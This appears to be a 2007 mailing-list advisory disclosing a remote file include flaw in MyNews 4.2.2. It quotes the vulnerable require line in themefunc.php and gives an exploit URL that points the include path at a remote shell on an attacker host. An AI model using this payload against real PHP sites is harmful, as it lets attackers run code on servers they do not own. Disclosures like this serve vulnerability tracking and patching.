Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

phpBB2 MODificat (phpbb_root_path) Remote File Include Exploit

CascadianFAQ <= 4.1 (index.php) Remote Blind SQL Injection Vulnerability

PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability

EncapsCMS 0.3.6 (common_foot. php) Remote File Include

From:	GolD_M <hacker__(at)_w.cn>
Date:	30.01.2007
Subject:	MyNews 4.2.2 <= Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

MyNews 4.2.2 <=  Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

Discovered by GolD_M(Mahmnood_ali)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

URL:
http://fresh.t-systems-sfr.com/unix/src/privat2/MyNews-4.2.2.tar.gz

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

V.CODE: In : /include/themes/themefunc.php  <<<<=====>>>>      Line : 2
require($myNewsConf['path']['sys']['index'] .  '/include/libs/modules.lib.php');

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

Exploit:
http://www.hedef.com/[mynews_path]/include/themes/themefunc.
php?myNewsConf[path][sys][index]=http://sh3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=